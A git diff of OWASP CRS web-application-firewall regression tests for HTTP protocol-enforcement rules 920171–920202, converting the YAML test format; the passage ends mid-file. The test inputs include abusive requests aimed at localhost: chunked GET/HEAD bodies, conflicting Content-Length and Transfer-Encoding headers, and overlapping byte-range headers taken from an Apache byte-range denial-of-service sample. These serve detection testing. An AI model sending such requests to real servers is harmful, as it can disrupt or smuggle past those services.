100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml @@ -1,76 +1,72 @@ --- meta: author: airween - enabled: true - name: 920171.yaml description: "A Selection of tests to trigger rule 920171" +rule_id: 920171 tests: - # POST Request with data (valid) - test_title: 920171-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked POST request with content "Hi CRS" in two lines - # POST / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - no_log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked POST request with content "Hi CRS" in two lines + # POST / HTTP/1.1 + # Accept: */* + # Host: localhost + # Transfer-Encoding: chunked + # User-Agent: "OWASP CRS test agent" + # + # 3 + # Hi + # 3 + # CRS + # 0 + # + encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + no_log_contains: "id \"920171\"" - # GET Request with chunked data (invalid) - test_title: 920171-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked GET request with content "Hi CRS" in two lines - # GET / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" - output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked GET request with content "Hi CRS" in two lines + # GET / HTTP/1.1 + # Accept: */* + # Host: localhost + # Transfer-Encoding: chunked + # User-Agent: "OWASP CRS test agent" + # + # 3 + # Hi + # 3 + # CRS + # 0 + # + encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQozDQpIaSANCjMNCkNSUw0KMA0KDQo=" + output: + log_contains: "id \"920171\"" - # HEAD Request with chunked data (invalid) - test_title: 920171-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked HEAD request with content "Hi CRS" in two lines - # HEAD / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked HEAD request with content "Hi CRS" in two lines + # HEAD / HTTP/1.1 + # Accept: */* + # Host: localhost + # Transfer-Encoding: chunked + # User-Agent: "OWASP CRS test agent" + # + # 3 + # Hi + # 3 + # CRS + # 0 + # + encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + log_contains: "id \"920171\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index 6af7fc1ac..f6c4546ec 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml @@ -1,83 +1,78 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920180.yaml" description: "Description" +rule_id: 920180 tests: - - test_title: 920180-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920180" - - test_title: 920180-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + stop_magic: true + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920180" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "920180" - - test_title: 920180-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "920180" + - test_id: 3 desc: POST request missing Content-Length Header (920180) from old modsec regressions stages: - - stage: - input: - stop_magic: true - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - output: - log_contains: id "920180" - - test_title: 920180-4 + - input: + stop_magic: true + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + output: + log_contains: id "920180" + - test_id: 4 desc: Ignore check of CT header if protocol is HTTP/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/2.0 - output: - no_log_contains: id "920180" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/2.0 + output: + no_log_contains: id "920180" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index af57064f1..c8f36e239 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -1,28 +1,26 @@ --- meta: author: "fgsch" - enabled: true - name: "920181.yaml" description: "Description" +rule_id: 920181 tests: - - test_title: 920181-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - uri: "/anything" - headers: - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Length: 7 - Content-Type: "application/x-www-form-urlencoded" - Transfer-Encoding: "chunked" - User-Agent: "OWASP CRS test agent" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/anything" + headers: + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Length: 7 + Content-Type: "application/x-www-form-urlencoded" + Transfer-Encoding: "chunked" + User-Agent: "OWASP CRS test agent" data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" - stop_magic: true - output: - # Apache unsets the Content-Length header if Transfer-Encoding is found! - status: 200 - no_log_contains: id "920181" + stop_magic: true + output: + # Apache unsets the Content-Length header if Transfer-Encoding is found! + status: 200 + no_log_contains: id "920181" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index 133323019..b4f29d6f0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml @@ -1,61 +1,57 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920190.yaml" description: "Description" +rule_id: 920190 tests: - - test_title: 920190-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "0-1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: HTTP/1.1 - output: - no_log_contains: id "920190" - - test_title: 920190-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "0-1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: HTTP/1.1 + output: + no_log_contains: id "920190" + - test_id: 2 desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - version: HTTP/1.1 - output: - log_contains: id "920190" - - test_title: 920190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + version: HTTP/1.1 + output: + log_contains: id "920190" + - test_id: 3 desc: "Status Page Test - Request-Range header field with range end less than range start" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Request-Range: bytes=64-0 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920190\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Request-Range: bytes=64-0 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920190\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index 07c81eacd..5f3be3dc6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml @@ -1,172 +1,161 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920200.yaml" description: "Description" +rule_id: 920200 tests: - - test_title: 920200-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php - test_title: 920200-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920200\"" - - test_title: 920200-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920200\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" + - test_id: 6 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920200" + - test_id: 7 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + no_log_contains: id "920200" + - test_id: 8 desc: "This should FAIL with rule 920200 (PL2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + log_contains: id "920200" + - test_id: 9 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + no_log_contains: id "920200" + - test_id: 10 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + no_log_contains: id "920200" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml index 5d9e663d9..46dd36bee 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml @@ -1,41 +1,38 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920201.yaml" description: "Tests for 920201" +rule_id: 920201 tests: - - test_title: 920201-1 + - test_id: 1 desc: This should FAIL with rule 920201 (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" - - test_title: 920201-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log_contains: id "920201" + - test_id: 2 desc: This should FAIL with rule 920201 (PL2), filename URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log_contains: id "920201" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml index e5c9c3be3..13647827f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml @@ -1,41 +1,38 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920202.yaml" description: "Tests for 920202" +rule_id: 920202 tests: - - test_title: 920202-1 + - test_id: 1 desc: This should FAIL with rule 920202 (PL4) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" - - test_title: 920202-2 + - input: + dest_addr: 